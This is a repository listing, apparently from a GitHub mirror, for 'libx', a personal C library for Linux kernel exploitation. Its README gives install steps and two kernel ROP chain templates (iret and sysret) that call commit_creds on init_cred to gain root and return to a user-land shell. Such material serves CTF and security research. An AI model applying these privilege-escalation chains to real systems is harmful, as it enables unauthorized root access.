https://github.com/n132/libx
A Linux Kernel Exploitation C Library
https://github.com/n132/libx
exploitation linux-kernel pwn
Last synced: 9 months ago
JSON representation
A Linux Kernel Exploitation C Library
- Host: GitHub
- URL: https://github.com/n132/libx
- Owner: n132
- Created: 2023-09-06T23:16:11.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2025-03-22T00:41:21.000Z (10 months ago)
- Last Synced: 2025-03-22T01:28:40.967Z (10 months ago)
- Topics: exploitation, linux-kernel, pwn
- Language: C
- Homepage:
- Size: 647 KB
- Stars: 6
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# libx
It's a personal c language library for kernel exploits.
# Dependencies
```sh
# If you use fuse
sudo apt install fuse libfuse-dev libkeyutils-dev
```
# Usage
Install `libx`
```bash
git clone git@github.com:n132/libx.git
cd libx
make && sudo make install
```
uninstall `libx`
```bash
make clean
make uninstall
```
# musl (optional)
```bash
make musl && sudo make install-musl
```
# Example
```c
//gcc main.c -o ./main -lx -w
#include
int main(){
libxInit();
}
```
# KROP
In kernel ROP, we usually return to user land by `iret` or `sysret`.
## iret
```c
p[idx++] = rdi;
p[idx++] = init_cred - NO_ASLR_BASE + base;
p[idx++] = commit_creds - NO_ASLR_BASE + base;
p[idx++] = swapgs_restore_regs_and_return_to_usermode + 103 - NO_ASLR_BASE + base;
p[idx++] = *(size_t*) "RDI";
p[idx++] = *(size_t*) "RAX";
p[idx++] = shell;
p[idx++] = user_cs;
p[idx++] = user_rflags;
p[idx++] = user_sp|8;
p[idx++] = user_ss;
```
## sysret
```c
p[idx++] = rdi;
p[idx++] = init_cred - NO_ASLR_BASE + base;
p[idx++] = commit_creds - NO_ASLR_BASE + base;
p[idx++] = r11;
p[idx++] = user_rflags;
p[idx++] = rcx;
p[idx++] = shell;
p[idx++] = sysret; // pop rsp; swapgs; sysret
p[idx++] = user_sp|8;
```